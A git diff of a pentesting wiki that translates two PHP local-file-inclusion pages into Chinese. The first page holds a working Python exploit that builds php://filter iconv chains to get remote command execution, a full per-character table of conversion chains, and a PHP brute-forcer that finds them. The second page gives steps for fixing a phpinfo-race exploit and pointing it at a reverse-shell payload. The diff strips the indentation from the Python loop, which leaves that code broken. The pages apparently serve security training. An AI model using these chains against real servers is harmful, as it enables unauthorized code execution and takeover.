+'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
 }
 
 
@@ -81,101 +80,97 @@ filters += "convert.iconv.UTF8.UTF7|"
 
 
 for c in base64_payload[::-1]:
-        filters += conversions[c] + "|"
-        # decode and reencode to get rid of everything that isn't valid base64
-        filters += "convert.base64-decode|"
-        filters += "convert.base64-encode|"
-        # get rid of equal signs
-        filters += "convert.iconv.UTF8.UTF7|"
+filters += conversions[c] + "|"
+# decode and reencode to get rid of everything that isn't valid base64
+filters += "convert.base64-decode|"
+filters += "convert.base64-encode|"
+# get rid of equal signs
+filters += "convert.iconv.UTF8.UTF7|"
 
 filters += "convert.base64-decode"
 
 final_payload = f"php://filter/{filters}/resource={file_to_use}"
 
 r = requests.get(url, params={
-    "0": command,
-    "action": "include",
-    "file": final_payload
+"0": command,
+"action": "include",
+"file": final_payload
 })
 
 print(r.text)
 ```
+### 改进
 
-### Improvements
-
-The previous script is limited to the base64 characters needed for that payload. Therefore, I created my own script to **bruteforce all the base64 characters**:
-
+之前的脚本仅限于该有效负载所需的 base64 字符。因此，我创建了自己的脚本来 **暴力破解所有的 base64 字符**：
 ```php
 conversions = {
-    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
-    '1': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF1002035D.EUC-KR|convert.iconv.MAC-CYRILLIC.T.61-8BIT|convert.iconv.1046.CSIBM864|convert.iconv.OSF1002035E.UCS-4BE|convert.iconv.EBCDIC-INT1.IBM943',
-    '2': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO6937.OSF1002011C|convert.iconv.CP1146.EUCJP-OPEN|convert.iconv.IBM1157.UTF8',
-    '3': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-7.CSISOLATIN3|convert.iconv.ISO-8859-9.CP905|convert.iconv.IBM1112.CSPC858MULTILINGUAL|convert.iconv.EBCDIC-CP-NL.ISO-10646',
-    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
-    '5': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.RUSCII.IBM275|convert.iconv.CSEBCDICFR.CP857|convert.iconv.EBCDIC-CP-WT.ISO88591',
-    '6': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-37.MACUK|convert.iconv.CSIBM297.ISO-IR-203',
-    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
-    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
-    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
-    'a': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9066.CP1371|convert.iconv.KOI8-RU.OSF00010101|convert.iconv.EBCDIC-CP-FR.ISO-IR-156',
-    'b': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1399.UCS4',
-    'c': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.8859_9.OSF100201F4|convert.iconv.IBM1112.CP1004|convert.iconv.OSF00010007.CP285|convert.iconv.IBM-1141.OSF10020402',
-    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
-    'e': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.SHIFT_JISX0213|convert.iconv.IBM1164.UCS-4',
-    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
-    'g': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022CN.CP855|convert.iconv.CSISO49INIS.IBM1142',
-    'h': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.THAI8.OSF100201B5|convert.iconv.NS_4551-1.CP1160|convert.iconv.CP275.IBM297',
-    'i': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM943|convert.iconv.CUBA.CSIBM1140',
-    'j': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.UCS-4BE|convert.iconv.IBM857.OSF1002011C',
-    'k': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO88594.CP912|convert.iconv.ISO-IR-121.CP1122|convert.iconv.IBM420.UTF-32LE|convert.iconv.OSF100201B5.IBM-1399',
-    'l': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.MACIS|convert.iconv.CSIBM865.10646-1:1993|convert.iconv.ISO_69372.CSEBCDICATDEA',
-    'm': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.CSSHIFTJIS|convert.iconv.NO2.CSIBM1399',
-    'n': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM862|convert.iconv.CP860.IBM-1399',
-    'o': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.CP861|convert.iconv.904.UTF-16|convert.iconv.IBM-1122.IBM1390',
-    'p': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1125.IBM1146|convert.iconv.IBM284.ISO_8859-16|convert.iconv.ISO-IR-143.IBM-933',
-    'q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NC_NC00-10:81.CSIBM863|convert.iconv.CP297.UTF16BE',
-    'r': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-86.ISO_8859-4:1988|convert.iconv.TURKISH8.CP1149',
-    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
-    't': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.WINDOWS-1251.CP1364|convert.iconv.IBM880.IBM-1146|convert.iconv.IBM-935.CP037|convert.iconv.IBM500.L3|convert.iconv.CP282.TS-5881',
-    'u': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937:1992.ISO-IR-121|convert.iconv.ISO_8859-7:1987.ANSI_X3.110|convert.iconv.CSIBM1158.UTF16BE',
-    'v': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.HU.ISO_6937:1992|convert.iconv.CSIBM863.IBM284',
-    'w': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937-2:1983.857|convert.iconv.8859_3.EBCDIC-CP-FR',
-    'x': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1254.ISO-IR-226|convert.iconv.CSMACINTOSH.IBM-1149|convert.iconv.EBCDICESA.UCS4|convert.iconv.1026.UTF-32LE',
-    'y': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.EBCDIC-INT1.IBM-1399',
-    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
-    'A': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-111.IBM1130|convert.iconv.L1.ISO-IR-156',
-    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
-    'C': 'convert.iconv.UTF8.CSISO2022KR',
-    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
-    'E': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.LATIN7.MACINTOSH|convert.iconv.CSN_369103.CSIBM1388',
-    'F': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9448.ISO-IR-103|convert.iconv.ISO-IR-199.T.61|convert.iconv.IEC_P27-1.CP937',
-    'G': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_8859-3:1988.CP1142|convert.iconv.CSIBM16804.CSIBM1388',
-    'H': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.EUCJP-OPEN|convert.iconv.CP5347.CP1144',
-    'I': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.DS2089|convert.iconv.OSF0004000A.CP852|convert.iconv.HPROMAN8.T.618BIT|convert.iconv.862.CSIBM1143',
-    'J': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.US.ISO-8859-13|convert.iconv.CP9066.CSIBM285',
-    'K': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1097.UTF-16BE',
-    'L': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ECMACYRILLIC.IBM256|convert.iconv.GEORGIAN-ACADEMY.10646-1:1993|convert.iconv.IBM-1122.IBM920',
-    'M': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.SE2.ISO885913|convert.iconv.866NAV.ISO2022JP2|convert.iconv.CP857.CP930',
-    'N': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM9066.UTF7|convert.iconv.MIK.CSIBM16804',
-    'O': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-197.CSIBM275|convert.iconv.IBM1112.UTF-16BE|convert.iconv.ISO_8859-3:1988.CP500',
-    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
-    'Q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NO.CP275|convert.iconv.EBCDIC-GREEK.CP936|convert.iconv.CP922.CP1255|convert.iconv.MAC-IS.EBCDIC-CP-IT',
-    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
-    'S': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1154.UCS4',
-    'T': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1163.CP1388|convert.iconv.OSF10020366.MS-MAC-CYRILLIC|convert.iconv.ISO-IR-25.ISO-IR-85|convert.iconv.GREEK.IBM-1144',
-    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
-    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
-    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
-    'X': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF10020388.IBM-935|convert.iconv.CP280.WINDOWS-1252|convert.iconv.CP284.IBM256|convert.iconv.CP284.LATIN1',
-    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
-    'Z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.CSEBCDICFISE',
-    '+': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ANSI_X3.4-1986.CP857|convert.iconv.OSF10020360.ISO885913|convert.iconv.EUCCN.UTF7|convert.iconv.GREEK7-OLD.UCS4',
-    '=': ''
+'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+'1': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF1002035D.EUC-KR|convert.iconv.MAC-CYRILLIC.T.61-8BIT|convert.iconv.1046.CSIBM864|convert.iconv.OSF1002035E.UCS-4BE|convert.iconv.EBCDIC-INT1.IBM943',
+'2': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO6937.OSF1002011C|convert.iconv.CP1146.EUCJP-OPEN|convert.iconv.IBM1157.UTF8',
+'3': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-7.CSISOLATIN3|convert.iconv.ISO-8859-9.CP905|convert.iconv.IBM1112.CSPC858MULTILINGUAL|convert.iconv.EBCDIC-CP-NL.ISO-10646',
+'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
+'5': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.RUSCII.IBM275|convert.iconv.CSEBCDICFR.CP857|convert.iconv.EBCDIC-CP-WT.ISO88591',
+'6': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-37.MACUK|convert.iconv.CSIBM297.ISO-IR-203',
+'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+'a': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9066.CP1371|convert.iconv.KOI8-RU.OSF00010101|convert.iconv.EBCDIC-CP-FR.ISO-IR-156',
+'b': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1399.UCS4',
+'c': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.8859_9.OSF100201F4|convert.iconv.IBM1112.CP1004|convert.iconv.OSF00010007.CP285|convert.iconv.IBM-1141.OSF10020402',
+'d': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
+'e': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.SHIFT_JISX0213|convert.iconv.IBM1164.UCS-4',
+'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+'g': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022CN.CP855|convert.iconv.CSISO49INIS.IBM1142',
+'h': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.THAI8.OSF100201B5|convert.iconv.NS_4551-1.CP1160|convert.iconv.CP275.IBM297',
+'i': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM943|convert.iconv.CUBA.CSIBM1140',
+'j': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.UCS-4BE|convert.iconv.IBM857.OSF1002011C',
+'k': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO88594.CP912|convert.iconv.ISO-IR-121.CP1122|convert.iconv.IBM420.UTF-32LE|convert.iconv.OSF100201B5.IBM-1399',
+'l': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.MACIS|convert.iconv.CSIBM865.10646-1:1993|convert.iconv.ISO_69372.CSEBCDICATDEA',
+'m': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.CSSHIFTJIS|convert.iconv.NO2.CSIBM1399',
+'n': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM862|convert.iconv.CP860.IBM-1399',
+'o': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.CP861|convert.iconv.904.UTF-16|convert.iconv.IBM-1122.IBM1390',
+'p': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1125.IBM1146|convert.iconv.IBM284.ISO_8859-16|convert.iconv.ISO-IR-143.IBM-933',
+'q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NC_NC00-10:81.CSIBM863|convert.iconv.CP297.UTF16BE',
+'r': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-86.ISO_8859-4:1988|convert.iconv.TURKISH8.CP1149',
+'s': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+'t': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.WINDOWS-1251.CP1364|convert.iconv.IBM880.IBM-1146|convert.iconv.IBM-935.CP037|convert.iconv.IBM500.L3|convert.iconv.CP282.TS-5881',
+'u': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937:1992.ISO-IR-121|convert.iconv.ISO_8859-7:1987.ANSI_X3.110|convert.iconv.CSIBM1158.UTF16BE',
+'v': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.HU.ISO_6937:1992|convert.iconv.CSIBM863.IBM284',
+'w': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937-2:1983.857|convert.iconv.8859_3.EBCDIC-CP-FR',
+'x': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1254.ISO-IR-226|convert.iconv.CSMACINTOSH.IBM-1149|convert.iconv.EBCDICESA.UCS4|convert.iconv.1026.UTF-32LE',
+'y': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.EBCDIC-INT1.IBM-1399',
+'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+'A': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-111.IBM1130|convert.iconv.L1.ISO-IR-156',
+'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+'C': 'convert.iconv.UTF8.CSISO2022KR',
+'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+'E': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.LATIN7.MACINTOSH|convert.iconv.CSN_369103.CSIBM1388',
+'F': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9448.ISO-IR-103|convert.iconv.ISO-IR-199.T.61|convert.iconv.IEC_P27-1.CP937',
+'G': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_8859-3:1988.CP1142|convert.iconv.CSIBM16804.CSIBM1388',
+'H': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.EUCJP-OPEN|convert.iconv.CP5347.CP1144',
+'I': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.DS2089|convert.iconv.OSF0004000A.CP852|convert.iconv.HPROMAN8.T.618BIT|convert.iconv.862.CSIBM1143',
+'J': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.US.ISO-8859-13|convert.iconv.CP9066.CSIBM285',
+'K': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1097.UTF-16BE',
+'L': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ECMACYRILLIC.IBM256|convert.iconv.GEORGIAN-ACADEMY.10646-1:1993|convert.iconv.IBM-1122.IBM920',
+'M': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.SE2.ISO885913|convert.iconv.866NAV.ISO2022JP2|convert.iconv.CP857.CP930',
+'N': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM9066.UTF7|convert.iconv.MIK.CSIBM16804',
+'O': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-197.CSIBM275|convert.iconv.IBM1112.UTF-16BE|convert.iconv.ISO_8859-3:1988.CP500',
+'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+'Q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NO.CP275|convert.iconv.EBCDIC-GREEK.CP936|convert.iconv.CP922.CP1255|convert.iconv.MAC-IS.EBCDIC-CP-IT',
+'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+'S': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1154.UCS4',
+'T': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1163.CP1388|convert.iconv.OSF10020366.MS-MAC-CYRILLIC|convert.iconv.ISO-IR-25.ISO-IR-85|convert.iconv.GREEK.IBM-1144',
+'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+'X': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF10020388.IBM-935|convert.iconv.CP280.WINDOWS-1252|convert.iconv.CP284.IBM256|convert.iconv.CP284.LATIN1',
+'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+'Z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.CSEBCDICFISE',
+'+': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ANSI_X3.4-1986.CP857|convert.iconv.OSF10020360.ISO885913|convert.iconv.EUCCN.UTF7|convert.iconv.GREEK7-OLD.UCS4',
+'=': ''
 }
 ```
-
-Here is the **script** to get encodings that generate each b64 letter:
-
+这里是**脚本**，用于获取生成每个 b64 字母的编码：
 ```php
 <?php
 
@@ -186,91 +181,89 @@ $known = array();
 
 
 function get_tranform($val, $convs){
-    foreach($convs as $conv){
-        $val = @iconv($conv[0], $conv[1], $val);
-    }
-    return $val;
+foreach($convs as $conv){
+$val = @iconv($conv[0], $conv[1], $val);
+}
+return $val;
 }
 
 
 function test_value($val, $convs){
-    global $known;
+global $known;
 
-    $cleaned = preg_replace('/[^a-zA-Z0-9=\+]/', '', $val);
+$cleaned = preg_replace('/[^a-zA-Z0-9=\+]/', '', $val);
 
-    if (strlen($cleaned) == 1 && ! in_array($cleaned, $known)){
-        $re_check = get_tranform("r", $convs);
-        $cleaned2 = preg_replace('/[^a-zA-Z0-9=\+]/', '', $re_check);
-        if ($cleaned2 === $cleaned){
+if (strlen($cleaned) == 1 && ! in_array($cleaned, $known)){
+$re_check = get_tranform("r", $convs);
+$cleaned2 = preg_replace('/[^a-zA-Z0-9=\+]/', '', $re_check);
+if ($cleaned2 === $cleaned){
 
-            $conv_str = "";
-            foreach($convs as $conv){
-                $conv_str .= "convert.iconv.".$conv[0].".".$conv[1]."|";
-            }
-            $conv_str = substr_replace($conv_str ,"", -1);
+$conv_str = "";
+foreach($convs as $conv){
+$conv_str .= "convert.iconv.".$conv[0].".".$conv[1]."|";
+}
+$conv_str = substr_replace($conv_str ,"", -1);
 
-            $value = @file_get_contents("php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|$conv_str|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://temp");
+$value = @file_get_contents("php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|$conv_str|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://temp");
 
-            if (strlen($value) > 0) {
-                echo "Combination found for letter $cleaned: ";
-                array_push($known, $cleaned);
-                echo "$conv_str\n";
+if (strlen($value) > 0) {
+echo "Combination found for letter $cleaned: ";
+array_push($known, $cleaned);
+echo "$conv_str\n";
 
-                if (count($known) == 64){
-                    echo "All found\n";
-                    exit(0);
-                }
-            }
-        }
-    }
+if (count($known) == 64){
+echo "All found\n";
+exit(0);
+}
+}
+}
+}
 }
 
 function find_vals($init_val) {
-    global $convs;
+global $convs;
 
-    $convs_used = array();
-    $current_val = iconv("UTF8", "CSISO2022KR", $init_val);
-    array_push($convs_used, array("UTF8", "CSISO2022KR"));
+$convs_used = array();
+$current_val = iconv("UTF8", "CSISO2022KR", $init_val);
+array_push($convs_used, array("UTF8", "CSISO2022KR"));
 
-    $current_val2 = "";
+$current_val2 = "";
 
-    for ($c = 0; $c < 5; $c++){
-        $conv1 = $convs[array_rand($convs, 1)];
-        $conv2 = $convs[array_rand($convs, 1)];
+for ($c = 0; $c < 5; $c++){
+$conv1 = $convs[array_rand($convs, 1)];
+$conv2 = $convs[array_rand($convs, 1)];
 
-        if ($conv1 === $conv2){
-            continue;
-        }
+if ($conv1 === $conv2){
+continue;
+}
 
-        $new_conv = array($conv1, $conv2);
-        array_push($convs_used, $new_conv);
+$new_conv = array($conv1, $conv2);
+array_push($convs_used, $new_conv);
 
-        $current_val2 = get_tranform($current_val, array($new_conv));
+$current_val2 = get_tranform($current_val, array($new_conv));
 
-        if ($current_val === $current_val2){
-            continue;
-        }
+if ($current_val === $current_val2){
+continue;
+}
 
-        $current_val = $current_val2;
-        test_value($current_val, $convs_used);
-    }
-  }
+$current_val = $current_val2;
+test_value($current_val, $convs_used);
+}
+}
 
-  while(true){
-    find_vals($init);
+while(true){
+find_vals($init);
 }
 ?>
 ```
-
-## More References
+## 更多参考
 
 - [https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index 15d63930e..12a48b358 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -2,44 +2,41 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用程序、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file_uploads = on" and the server has to be able to write in the "/tmp" directory.**
+要利用此漏洞，您需要：**一个LFI漏洞，一个显示phpinfo()的页面，“file_uploads = on”，并且服务器必须能够在“/tmp”目录中写入。**
 
 [https://www.insomniasec.com/downloads/publications/phpinfolfi.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 
-**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
-
-You need to fix the exploit (change **=>** for **=>**). To do so you can do:
+**教程 HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
 
+您需要修复漏洞（将**=>**更改为**=>**）。为此，您可以执行：
 ```
 sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
 ```
-
-You have to change also the **payload** at the beginning of the exploit (for a php-rev-shell for example), the **REQ1** (this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), and **LFIREQ** (this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char)
